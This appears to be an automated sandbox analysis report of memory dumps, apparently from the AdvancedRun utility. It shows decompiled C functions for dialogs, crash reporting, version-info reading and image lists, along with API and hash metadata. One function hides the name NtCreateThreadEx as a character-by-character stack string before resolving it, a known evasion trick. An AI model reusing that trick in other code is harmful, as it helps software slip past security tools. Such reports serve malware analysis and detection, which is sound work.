                                                                                                                								} else {
                                                                                                                									_t85 = _a12;
                                                                                                                									_t98 = _t85 & 0x0000ffff;
                                                                                                                									_v12.x = _t98;
                                                                                                                									_v12.y = _t85 >> 0x10;
                                                                                                                									_t87 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
                                                                                                                									_push(_v12.y);
                                                                                                                									_a8 = _t87;
                                                                                                                									if(ChildWindowFromPoint( *(_t117 + 0x10), _t98) != _a8) {
                                                                                                                										__eflags =  *0x40ff30;
                                                                                                                										if( *0x40ff30 == 0) {
                                                                                                                											goto L30;
                                                                                                                										} else {
                                                                                                                											_t89 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
                                                                                                                											_push(_v12.y);
                                                                                                                											_t90 = ChildWindowFromPoint( *(_t117 + 0x10), _v12);
                                                                                                                											__eflags = _t90 - _t89;
                                                                                                                											if(_t90 != _t89) {
                                                                                                                												goto L30;
                                                                                                                											} else {
                                                                                                                												_push(0x40ff30);
                                                                                                                												goto L7;
                                                                                                                											}
                                                                                                                										}
                                                                                                                									} else {
                                                                                                                										_push(_t117 + 0x23e);
                                                                                                                										L7:
                                                                                                                										_push( *(_t117 + 0x10));
                                                                                                                										E00404F7E();
                                                                                                                										L8:
                                                                                                                										_t56 = 1;
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return _t56;
                                                                                                                			}




























                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                                • String ID: AdvancedRun
                                                                                                                • API String ID: 829165378-481304740
                                                                                                                • Opcode ID: a07d2d5b487f31c3e1d27064e8330fba163acc1cc8c3fec135df1b57c4fd270f
                                                                                                                • Instruction ID: 224fbb10fd18d8c83ffedf6f1f5ae1765c75c0bde1a98b5884793aa0480d770d
                                                                                                                • Opcode Fuzzy Hash: a07d2d5b487f31c3e1d27064e8330fba163acc1cc8c3fec135df1b57c4fd270f
                                                                                                                • Instruction Fuzzy Hash: 12517D31510308EBDB216FA0DD84E6A7BB6FB44304F104A3AFA11B65F1CB79A954EB18
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 45%
                                                                                                                			E00408ADB(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, void* _a8, unsigned int _a12) {
                                                                                                                				void _v259;
                                                                                                                				void _v260;
                                                                                                                				void _v515;
                                                                                                                				void _v516;
                                                                                                                				char _v1048;
                                                                                                                				void _v1052;
                                                                                                                				void _v1056;
                                                                                                                				void _v1560;
                                                                                                                				long _v1580;
                                                                                                                				void _v3626;
                                                                                                                				char _v3628;
                                                                                                                				void _v5674;
                                                                                                                				char _v5676;
                                                                                                                				void _v9770;
                                                                                                                				short _v9772;
                                                                                                                				void* __edi;
                                                                                                                				void* _t45;
                                                                                                                				void* _t60;
                                                                                                                				int _t61;
                                                                                                                				int _t63;
                                                                                                                				int _t64;
                                                                                                                				long _t68;
                                                                                                                				struct HWND__* _t94;
                                                                                                                				signed int _t103;
                                                                                                                				intOrPtr _t127;
                                                                                                                				unsigned int _t130;
                                                                                                                				void* _t132;
                                                                                                                				void* _t135;
                                                                                                                
                                                                                                                				E0040B550(0x2628, __ecx);
                                                                                                                				_t45 = _a8 - 0x110;
                                                                                                                				if(_t45 == 0) {
                                                                                                                					E00404DA9(__edx, _a4, 4);
                                                                                                                					_v9772 = 0;
                                                                                                                					memset( &_v9770, 0, 0xffe);
                                                                                                                					_t103 = 5;
                                                                                                                					memcpy( &_v1580, L"{Unknown}", _t103 << 2);
                                                                                                                					memset( &_v1560, 0, 0x1f6);
                                                                                                                					_v260 = 0;
                                                                                                                					memset( &_v259, 0, 0xff);
                                                                                                                					_v516 = 0;
                                                                                                                					memset( &_v515, 0, 0xff);
                                                                                                                					_v5676 = 0;
                                                                                                                					memset( &_v5674, 0, 0x7fe);
                                                                                                                					_v3628 = 0;
                                                                                                                					memset( &_v3626, 0, 0x7fe);
                                                                                                                					_t135 = _t132 + 0x5c;
                                                                                                                					_t60 = GetCurrentProcess();
                                                                                                                					_t105 =  &_v260;
                                                                                                                					_a8 = _t60;
                                                                                                                					_t61 = ReadProcessMemory(_t60,  *0x40f3bc,  &_v260, 0x80, 0);
                                                                                                                					__eflags = _t61;
                                                                                                                					if(_t61 != 0) {
                                                                                                                						E00404FE0( &_v5676,  &_v260, 4);
                                                                                                                						_pop(_t105);
                                                                                                                					}
                                                                                                                					_t63 = ReadProcessMemory(_a8,  *0x40f3b0,  &_v516, 0x80, 0);
                                                                                                                					__eflags = _t63;
                                                                                                                					if(_t63 != 0) {
                                                                                                                						E00404FE0( &_v3628,  &_v516, 0);
                                                                                                                						_pop(_t105);
                                                                                                                					}
                                                                                                                					_t64 = E00404BD3();
                                                                                                                					__eflags = _t64;
                                                                                                                					if(_t64 == 0) {
                                                                                                                						E004090EE();
                                                                                                                					} else {
                                                                                                                						E00409172();
                                                                                                                					}
                                                                                                                					__eflags =  *0x4101b8; // 0x0
                                                                                                                					if(__eflags != 0) {
                                                                                                                						L17:
                                                                                                                						_v1056 = 0;
                                                                                                                						memset( &_v1052, 0, 0x218);
                                                                                                                						_t127 =  *0x40f5d4; // 0x0
                                                                                                                						_t135 = _t135 + 0xc;
                                                                                                                						_t68 = GetCurrentProcessId();
                                                                                                                						_push(_t127);
                                                                                                                						_push(_t68);
                                                                                                                						 *0x40f84c = 0;
                                                                                                                						E004092F0(_t105, __eflags);
                                                                                                                						__eflags =  *0x40f84c; // 0x0
                                                                                                                						if(__eflags != 0) {
                                                                                                                							memcpy( &_v1056, 0x40f850, 0x21c);
                                                                                                                							_t135 = _t135 + 0xc;
                                                                                                                							__eflags =  *0x40f84c; // 0x0
                                                                                                                							if(__eflags != 0) {
                                                                                                                								wcscpy( &_v1580, E00404B3E( &_v1048));
                                                                                                                							}
                                                                                                                						}
                                                                                                                						goto L20;
                                                                                                                					} else {
                                                                                                                						__eflags =  *0x4101bc; // 0x0
                                                                                                                						if(__eflags == 0) {
                                                                                                                							L20:
                                                                                                                							_push( &_v3628);
                                                                                                                							_push( &_v5676);
                                                                                                                							_push( *0x40f3b0);
                                                                                                                							_push( *0x40f3bc);
                                                                                                                							_push( *0x40f3ac);
                                                                                                                							_push( *0x40f394);
                                                                                                                							_push( *0x40f398);
                                                                                                                							_push( *0x40f3a0);
                                                                                                                							_push( *0x40f3a4);
                                                                                                                							_push( *0x40f39c);
                                                                                                                							_push( *0x40f3a8);
                                                                                                                							_push( &_v1580);
                                                                                                                							_push( *0x40f5d4);
                                                                                                                							_push( *0x40f5c8);
                                                                                                                							_push(L"Exception %8.8X at address %8.8X in module %s\r\nRegisters: \r\nEAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8X\r\nESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8X\r\nEIP=%8.8X\r\nStack Data: %s\r\nCode Data: %s\r\n");
                                                                                                                							_push(0x800);
                                                                                                                							_push( &_v9772);
                                                                                                                							L0040B1EC();
                                                                                                                							SetDlgItemTextW(_a4, 0x3ea,  &_v9772);
                                                                                                                							SetFocus(GetDlgItem(_a4, 0x3ea));
                                                                                                                							L21:
                                                                                                                							return 0;
                                                                                                                						}
                                                                                                                						goto L17;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				if(_t45 == 1) {
                                                                                                                					_t130 = _a12;
                                                                                                                					if(_t130 >> 0x10 == 0) {
                                                                                                                						if(_t130 == 3) {
                                                                                                                							_t94 = GetDlgItem(_a4, 0x3ea);
                                                                                                                							_a4 = _t94;
                                                                                                                							SendMessageW(_t94, 0xb1, 0, 0xffff);
                                                                                                                							SendMessageW(_a4, 0x301, 0, 0);
                                                                                                                							SendMessageW(_a4, 0xb1, 0, 0);
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				goto L21;
                                                                                                                			}































                                                                                                                0x00408dc5
                                                                                                                0x00408dc5
                                                                                                                0x00000000
                                                                                                                0x00408cad
                                                                                                                0x00408ca5
                                                                                                                0x00408af6
                                                                                                                0x00408afc
                                                                                                                0x00408b07
                                                                                                                0x00408b2a
                                                                                                                0x00408b38
                                                                                                                0x00408b53
                                                                                                                0x00408b56
                                                                                                                0x00408b62
                                                                                                                0x00408b6a
                                                                                                                0x00408b6a
                                                                                                                0x00408b2a
                                                                                                                0x00408b07
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00408D85
                                                                                                                • {Unknown}, xrefs: 00408BA5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                                • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                                • API String ID: 4111938811-1819279800
                                                                                                                • Opcode ID: da6163a693f44e98dc338dc238bd85c57536ed619285caa4b2ce51e2a39adb2b
                                                                                                                • Instruction ID: 89cdabe1f300c5598f457b205db6f7bf21b56caa474a1127ebd0a37068e91017
                                                                                                                • Opcode Fuzzy Hash: da6163a693f44e98dc338dc238bd85c57536ed619285caa4b2ce51e2a39adb2b
                                                                                                                • Instruction Fuzzy Hash: FD7184B280021DBEDB219B51DD85EDB377CEF08354F0444BAFA08B6191DB799E848F68
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 82%
                                                                                                                			E0040B04D(intOrPtr* __edi, short* _a4) {
                                                                                                                				int _v8;
                                                                                                                				void* _v12;
                                                                                                                				void* _v16;
                                                                                                                				int _v20;
                                                                                                                				long _v60;
                                                                                                                				char _v572;
                                                                                                                				void* __esi;
                                                                                                                				int _t47;
                                                                                                                				void* _t50;
                                                                                                                				signed short* _t76;
                                                                                                                				void* _t81;
                                                                                                                				void* _t84;
                                                                                                                				intOrPtr* _t96;
                                                                                                                				int _t97;
                                                                                                                
                                                                                                                				_t96 = __edi;
                                                                                                                				_t97 = 0;
                                                                                                                				_v20 = 0;
                                                                                                                				_t47 = GetFileVersionInfoSizeW(_a4,  &_v20);
                                                                                                                				_v8 = _t47;
                                                                                                                				if(_t47 > 0) {
                                                                                                                					_t50 = E00405AA7(__edi);
                                                                                                                					_push(_v8);
                                                                                                                					L0040B26C();
                                                                                                                					_t84 = _t50;
                                                                                                                					GetFileVersionInfoW(_a4, 0, _v8, _t84);
                                                                                                                					if(VerQueryValueW(_t84, "\\",  &_v12,  &_v8) != 0) {
                                                                                                                						_t81 = _v12;
                                                                                                                						_t11 = _t81 + 0x30; // 0x4d46e853
                                                                                                                						 *((intOrPtr*)(__edi + 4)) =  *_t11;
                                                                                                                						_t13 = _t81 + 8; // 0x8d50ffff
                                                                                                                						 *__edi =  *_t13;
                                                                                                                						_t14 = _t81 + 0x14; // 0x5900004d
                                                                                                                						 *((intOrPtr*)(__edi + 0xc)) =  *_t14;
                                                                                                                						_t16 = _t81 + 0x10; // 0x65e850ff
                                                                                                                						 *((intOrPtr*)(__edi + 8)) =  *_t16;
                                                                                                                						_t18 = _t81 + 0x24; // 0xf4680000
                                                                                                                						 *((intOrPtr*)(__edi + 0x10)) =  *_t18;
                                                                                                                						_t20 = _t81 + 0x28; // 0xbb0040cd
                                                                                                                						 *((intOrPtr*)(__edi + 0x14)) =  *_t20;
                                                                                                                					}
                                                                                                                					if(VerQueryValueW(_t84, L"\\VarFileInfo\\Translation",  &_v16,  &_v8) == 0) {
                                                                                                                						L5:
                                                                                                                						wcscpy( &_v60, L"040904E4");
                                                                                                                					} else {
                                                                                                                						_t76 = _v16;
                                                                                                                						_push(_t76[1] & 0x0000ffff);
                                                                                                                						_push( *_t76 & 0x0000ffff);
                                                                                                                						_push(L"%4.4X%4.4X");
                                                                                                                						_push(0x14);
                                                                                                                						_push( &_v60);
                                                                                                                						L0040B1EC();
                                                                                                                						if(E0040AFBE( &_v572, _t84,  &_v60, 0x40c4e8) == 0) {
                                                                                                                							goto L5;
                                                                                                                						}
                                                                                                                					}
                                                                                                                					E0040AFBE(_t96 + 0x18, _t84,  &_v60, L"ProductName");
                                                                                                                					E0040AFBE(_t96 + 0x218, _t84,  &_v60, L"FileDescription");
                                                                                                                					E0040AFBE(_t96 + 0x418, _t84,  &_v60, L"FileVersion");
                                                                                                                					E0040AFBE(_t96 + 0x618, _t84,  &_v60, L"ProductVersion");
                                                                                                                					E0040AFBE(_t96 + 0x818, _t84,  &_v60, L"CompanyName");
                                                                                                                					E0040AFBE(_t96 + 0xa18, _t84,  &_v60, L"InternalName");
                                                                                                                					E0040AFBE(_t96 + 0xc18, _t84,  &_v60, L"LegalCopyright");
                                                                                                                					E0040AFBE(_t96 + 0xe18, _t84,  &_v60, L"OriginalFileName");
                                                                                                                					_push(_t84);
                                                                                                                					_t97 = 1;
                                                                                                                					L0040B272();
                                                                                                                				}
                                                                                                                				return _t97;
                                                                                                                			}


















                                                                                                                APIs
                                                                                                                • GetFileVersionInfoSizeW.VERSION(004064D2,?,00000000), ref: 0040B063
                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040B07E
                                                                                                                • GetFileVersionInfoW.VERSION(004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B08E
                                                                                                                • VerQueryValueW.VERSION(00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0A1
                                                                                                                • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0DE
                                                                                                                • _snwprintf.MSVCRT ref: 0040B0FE
                                                                                                                • wcscpy.MSVCRT ref: 0040B128
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040B1D8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: FileInfoQueryValueVersion$??2@??3@Size_snwprintfwcscpy
                                                                                                                • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                                • API String ID: 1223191525-1542517562
                                                                                                                • Opcode ID: 7d0a25dbe63dd51685ec4fd467e5617a4705a8ce8e8c15efb6301eb2ec3eaad9
                                                                                                                • Instruction ID: 283451b663653e95218ba9e6ce5340ec929c4f2fba7a9b8c11281d5ea0e9195a
                                                                                                                • Opcode Fuzzy Hash: 7d0a25dbe63dd51685ec4fd467e5617a4705a8ce8e8c15efb6301eb2ec3eaad9
                                                                                                                • Instruction Fuzzy Hash: E34144B2940219BAC704EBA5DD41DDEB7BDEF08704F100177B905B3181DB78AA59CBD8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 76%
                                                                                                                			E0040A1EF(struct HINSTANCE__** __esi) {
                                                                                                                				char _v8;
                                                                                                                				char _v9;
                                                                                                                				char _v10;
                                                                                                                				char _v11;
                                                                                                                				char _v12;
                                                                                                                				char _v13;
                                                                                                                				char _v14;
                                                                                                                				char _v15;
                                                                                                                				char _v16;
                                                                                                                				char _v17;
                                                                                                                				char _v18;
                                                                                                                				char _v19;
                                                                                                                				char _v20;
                                                                                                                				char _v21;
                                                                                                                				char _v22;
                                                                                                                				char _v23;
                                                                                                                				char _v24;
                                                                                                                				struct HINSTANCE__* _t27;
                                                                                                                
                                                                                                                				if( *__esi != 0) {
                                                                                                                					L3:
                                                                                                                					return 1;
                                                                                                                				}
                                                                                                                				_t27 = LoadLibraryW(L"ntdll.dll");
                                                                                                                				 *__esi = _t27;
                                                                                                                				if(_t27 != 0) {
                                                                                                                					asm("stosd");
                                                                                                                					asm("stosd");
                                                                                                                					asm("stosd");
                                                                                                                					asm("stosd");
                                                                                                                					asm("stosw");
                                                                                                                					asm("stosb");
                                                                                                                					_v24 = 0x4e;
                                                                                                                					_v23 = 0x74;
                                                                                                                					_v13 = 0x65;
                                                                                                                					_v12 = 0x61;
                                                                                                                					_v18 = 0x74;
                                                                                                                					_v17 = 0x65;
                                                                                                                					_v22 = 0x43;
                                                                                                                					_v14 = 0x72;
                                                                                                                					_v11 = 0x64;
                                                                                                                					_v21 = 0x72;
                                                                                                                					_v10 = 0x45;
                                                                                                                					_v9 = 0x78;
                                                                                                                					_v20 = 0x65;
                                                                                                                					_v19 = 0x61;
                                                                                                                					_v16 = 0x54;
                                                                                                                					_v15 = 0x68;
                                                                                                                					_v8 = 0;
                                                                                                                					__esi[1] = GetProcAddress(_t27,  &_v24);
                                                                                                                					goto L3;
                                                                                                                				}
                                                                                                                				return 0;
                                                                                                                			}






















                                                                                                                APIs
                                                                                                                • LoadLibraryW.KERNEL32(ntdll.dll,?,?,?,?,0040A2A4), ref: 0040A1FF
                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 0040A263
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: C$E$N$T$a$a$d$e$e$e$h$ntdll.dll$r$r$t$t$x
                                                                                                                • API String ID: 2574300362-1257427173
                                                                                                                • Opcode ID: 7c4b767998ad850fb5a7cf24f594afd5e084a11fa120f3cae330cd392d2e2909
                                                                                                                • Instruction ID: 28a3addb3bc40b583479f690f9d6e65064931713b616a12c977b5f47a4008353
                                                                                                                • Opcode Fuzzy Hash: 7c4b767998ad850fb5a7cf24f594afd5e084a11fa120f3cae330cd392d2e2909
                                                                                                                • Instruction Fuzzy Hash: 08110A2090C6C9EDEB12C7FCC40879EBEF15B26709F0881ECC585B6292C6BA5758C776
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 63%
                                                                                                                			E00407F8D(void* __eax) {
                                                                                                                				struct _SHFILEINFOW _v692;
                                                                                                                				void _v1214;
                                                                                                                				short _v1216;
                                                                                                                				void* _v1244;
                                                                                                                				void* _v1248;
                                                                                                                				void* _v1252;
                                                                                                                				void* _v1256;
                                                                                                                				void* _v1268;
                                                                                                                				void* _t37;
                                                                                                                				long _t38;
                                                                                                                				long _t46;
                                                                                                                				long _t48;
                                                                                                                				long _t58;
                                                                                                                				void* _t62;
                                                                                                                				intOrPtr* _t64;
                                                                                                                
                                                                                                                				_t64 = ImageList_Create;
                                                                                                                				_t62 = __eax;
                                                                                                                				if( *((intOrPtr*)(__eax + 0x2b4)) != 0) {
                                                                                                                					if( *((intOrPtr*)(__eax + 0x2bc)) == 0) {
                                                                                                                						_t48 = ImageList_Create(0x10, 0x10, 0x19, 1, 1);
                                                                                                                						 *(_t62 + 0x2a8) = _t48;
                                                                                                                						__imp__ImageList_SetImageCount(_t48, 0);
                                                                                                                						_push( *(_t62 + 0x2a8));
                                                                                                                					} else {
                                                                                                                						_v692.hIcon = 0;
                                                                                                                						memset( &(_v692.iIcon), 0, 0x2b0);
                                                                                                                						_v1216 = 0;
                                                                                                                						memset( &_v1214, 0, 0x208);
                                                                                                                						GetWindowsDirectoryW( &_v1216, 0x104);
                                                                                                                						_t58 = SHGetFileInfoW( &_v1216, 0,  &_v692, 0x2b4, 0x4001);
                                                                                                                						 *(_t62 + 0x2a8) = _t58;
                                                                                                                						_push(_t58);
                                                                                                                					}
                                                                                                                					SendMessageW( *(_t62 + 0x2a0), 0x1003, 1, ??);
                                                                                                                				}
                                                                                                                				if( *((intOrPtr*)(_t62 + 0x2b8)) != 0) {
                                                                                                                					_t46 =  *_t64(0x20, 0x20, 0x19, 1, 1);
                                                                                                                					 *(_t62 + 0x2ac) = _t46;
                                                                                                                					__imp__ImageList_SetImageCount(_t46, 0);
                                                                                                                					SendMessageW( *(_t62 + 0x2a0), 0x1003, 0,  *(_t62 + 0x2ac));
                                                                                                                				}
                                                                                                                				 *(_t62 + 0x2a4) =  *_t64(0x10, 0x10, 0x19, 1, 1);
                                                                                                                				_v1248 = LoadImageW(GetModuleHandleW(0), 0x85, 0, 0x10, 0x10, 0x1000);
                                                                                                                				_t37 = LoadImageW(GetModuleHandleW(0), 0x86, 0, 0x10, 0x10, 0x1000);
                                                                                                                				_v1244 = _t37;
                                                                                                                				__imp__ImageList_SetImageCount( *(_t62 + 0x2a4), 0);
                                                                                                                				_t38 = GetSysColor(0xf);
                                                                                                                				_v1248 = _t38;
                                                                                                                				ImageList_AddMasked( *(_t62 + 0x2a4), _v1256, _t38);
                                                                                                                				ImageList_AddMasked( *(_t62 + 0x2a4), _v1252, _v1248);
                                                                                                                				DeleteObject(_v1268);
                                                                                                                				DeleteObject(_v1268);
                                                                                                                				return SendMessageW(E0040331D( *(_t62 + 0x2a0)), 0x1208, 0,  *(_t62 + 0x2a4));
                                                                                                                			}



















                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00407FD0
                                                                                                                • memset.MSVCRT ref: 00407FE5
                                                                                                                • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00407FF7
                                                                                                                • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 00408015
                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040802E
                                                                                                                • ImageList_SetImageCount.COMCTL32(00000000,00000000), ref: 00408038
                                                                                                                • SendMessageW.USER32(?,00001003,00000001,?), ref: 00408051
                                                                                                                • ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 00408065
                                                                                                                • ImageList_SetImageCount.COMCTL32(00000000,00000000), ref: 0040806F
                                                                                                                • SendMessageW.USER32(?,00001003,00000000,?), ref: 00408087
                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00408093
                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004080A2
                                                                                                                • LoadImageW.USER32 ref: 004080B4
                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004080BF
                                                                                                                • LoadImageW.USER32 ref: 004080D1
                                                                                                                • ImageList_SetImageCount.COMCTL32(?,00000000), ref: 004080E2
                                                                                                                • GetSysColor.USER32(0000000F), ref: 004080EA
                                                                                                                • ImageList_AddMasked.COMCTL32(?,00000000,00000000), ref: 00408105
                                                                                                                • ImageList_AddMasked.COMCTL32(?,?,?), ref: 00408115
                                                                                                                • DeleteObject.GDI32(?), ref: 00408121
                                                                                                                • DeleteObject.GDI32(?), ref: 00408127
                                                                                                                • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 00408144
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Image$List_$CountCreateMessageSend$DeleteHandleLoadMaskedModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                                • String ID:
                                                                                                                • API String ID: 304928396-0
                                                                                                                • Opcode ID: d4ab9f05862d1af7c7dd0e0dd7fd39e91fe05cdd650fdb134c44776c28691368
                                                                                                                • Instruction ID: fc02d650de5297a4f4a3b2912da131a5170d4a501b91b7a2a94f7b4638737e48
                                                                                                                • Opcode Fuzzy Hash: d4ab9f05862d1af7c7dd0e0dd7fd39e91fe05cdd650fdb134c44776c28691368
                                                                                                                • Instruction Fuzzy Hash: 8F418971640304FFE6306B61DD8AF977BACFF89B00F00092DB795A51D1DAB55450DB29
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 69%
                                                                                                                			E0040AE90(void* __esi, wchar_t* _a4, wchar_t* _a8) {
                                                                                                                				int _v8;
                                                                                                                				void _v518;
                                                                                                                				long _v520;
                                                                                                                				void _v1030;
                                                                                                                				char _v1032;
                                                                                                                				intOrPtr _t32;
                                                                                                                				wchar_t* _t57;
                                                                                                                				void* _t58;
                                                                                                                				void* _t59;
                                                                                                                				void* _t60;
                                                                                                                
                                                                                                                				_t58 = __esi;
                                                                                                                				_v520 = 0;
                                                                                                                				memset( &_v518, 0, 0x1fc);
                                                                                                                				_v1032 = 0;
                                                                                                                				memset( &_v1030, 0, 0x1fc);
                                                                                                                				_t60 = _t59 + 0x18;
                                                                                                                				_v8 = 1;
                                                                                                                				if( *((intOrPtr*)(__esi + 4)) == 0xffffffff &&  *((intOrPtr*)(__esi + 8)) <= 0) {
                                                                                                                					_v8 = 0;
                                                                                                                				}
                                                                                                                				_t57 = _a4;
                                                                                                                				 *_t57 = 0;
                                                                                                                				if(_v8 != 0) {
                                                                                                                					wcscpy(_t57, L"<font");
                                                                                                                					_t32 =  *((intOrPtr*)(_t58 + 8));
                                                                                                                					if(_t32 > 0) {
                                                                                                                						_push(_t32);
                                                                                                                						_push(L" size=\"%d\"");
                                                                                                                						_push(0xff);
                                                                                                                						_push( &_v520);
                                                                                                                						L0040B1EC();
                                                                                                                						wcscat(_t57,  &_v520);
                                                                                                                						_t60 = _t60 + 0x18;
                                                                                                                					}
                                                                                                                					_t33 =  *((intOrPtr*)(_t58 + 4));
                                                                                                                					if( *((intOrPtr*)(_t58 + 4)) != 0xffffffff) {
                                                                                                                						_push(E0040ADC0(_t33,  &_v1032));
                                                                                                                						_push(L" color=\"#%s\"");
                                                                                                                						_push(0xff);
                                                                                                                						_push( &_v520);
                                                                                                                						L0040B1EC();
                                                                                                                						wcscat(_t57,  &_v520);
                                                                                                                					}
                                                                                                                					wcscat(_t57, ">");
                                                                                                                				}
                                                                                                                				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
                                                                                                                					wcscat(_t57, L"<b>");
                                                                                                                				}
                                                                                                                				wcscat(_t57, _a8);
                                                                                                                				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
                                                                                                                					wcscat(_t57, L"</b>");
                                                                                                                				}
                                                                                                                				if(_v8 != 0) {
                                                                                                                					wcscat(_t57, L"</font>");
                                                                                                                				}
                                                                                                                				return _t57;
                                                                                                                			}














                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                                                • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                • API String ID: 3143752011-1996832678
                                                                                                                • Opcode ID: 330f77f369881cb7aaffb2d4d29cef926f955dd174757b27785871b236def110
                                                                                                                • Instruction ID: 2e7f7f44a8c08f278b605cd2082ab28bfbf3198b566a778c3f72e8233e5ba29a
                                                                                                                • Opcode Fuzzy Hash: 330f77f369881cb7aaffb2d4d29cef926f955dd174757b27785871b236def110
